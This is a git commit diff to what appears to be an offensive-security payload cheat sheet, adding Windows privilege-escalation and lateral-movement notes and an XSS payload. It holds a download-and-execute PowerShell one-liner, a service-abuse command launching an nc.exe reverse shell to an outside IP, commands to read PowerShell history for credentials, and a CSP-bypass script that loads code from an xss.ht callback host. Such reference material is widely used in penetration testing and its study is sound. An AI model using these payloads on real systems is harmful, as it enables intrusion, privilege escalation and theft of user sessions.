Powershell Remoting
parent
268b4c2d47
commit
c7e3ea005e
|
@ -457,6 +457,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
|||
### Powershell history
|
||||
|
||||
```powershell
|
||||
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
||||
cat (Get-PSReadlineOption).HistorySavePath
|
||||
|
@ -676,7 +677,24 @@ wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows
|
|||
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
||||
```
|
||||
|
||||
Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
|
||||
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
|
||||
* PowerUp exploit
|
||||
|
||||
```powershell
|
||||
# find the vulnerable application
|
||||
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
|
||||
|
||||
...
|
||||
[*] Checking for unquoted service paths...
|
||||
ServiceName : BBSvc
|
||||
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
|
||||
StartName : LocalSystem
|
||||
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
|
||||
...
|
||||
|
||||
# automatic exploit
|
||||
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||
```
|
||||
|
||||
### Example
|
||||
|
||||
|
|
|
@ -11,6 +11,7 @@
|
|||
* [Metasploit - Psexec](#metasploit-psexec)
|
||||
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
||||
* [WinRM](#winrm)
|
||||
* [Powershell Remoting](#powershell-remoting)
|
||||
* [Crackmapexec](#crackmapexec)
|
||||
* [Winexe](#winexe)
|
||||
* [WMI](#wmi)
|
||||
|
@ -147,6 +148,30 @@ conn.shell(:powershell) do |shell|
|
|||
end
|
||||
```
|
||||
|
||||
|
||||
## Powershell Remoting
|
||||
|
||||
> PSSESSION
|
||||
|
||||
```powershell
|
||||
PS> Enable-PSRemoting
|
||||
|
||||
# one-to-one interactive session
|
||||
PS> Enter-PSSession -computerName DC01
|
||||
[DC01]: PS>
|
||||
|
||||
# one-to-one execute scripts and commands
|
||||
PS> $Session = New-PSSession -ComputerName CLIENT1
|
||||
PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 }
|
||||
PS> Invoke-Command -Session $Session -scriptBlock { $test }
|
||||
1
|
||||
|
||||
# one-to-many execute scripts and commands
|
||||
PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service }
|
||||
PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
|
||||
```
|
||||
|
||||
|
||||
## Winexe
|
||||
|
||||
Integrated to Kali
|
||||
|
@ -262,6 +287,7 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
|
|||
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
||||
|
|
|
@ -4,7 +4,13 @@ A list of useful payloads and bypasses for Web Application Security.
|
|||
Feel free to improve with your payloads and techniques !
|
||||
I :heart: pull requests :)
|
||||
|
||||
You can also contribute with a :beers: IRL
|
||||
You can also contribute with a :beers: IRL, or using the sponsor button.
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://repository-images.githubusercontent.com/71220757/fac34f00-9854-11ea-9d6f-55fe78f233fb">
|
||||
</p>
|
||||
|
||||
|
||||
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
|
||||
|
||||
|
|
|
@ -972,7 +972,8 @@ window.frames[0].document.head.appendChild(script);
|
|||
### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
|
||||
|
||||
```js
|
||||
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
|
||||
// CSP Bypass with Inline and Eval
|
||||
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
|
||||
```
|
||||
|
||||
### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)
|
||||
|
|
Loading…
Reference in New Issue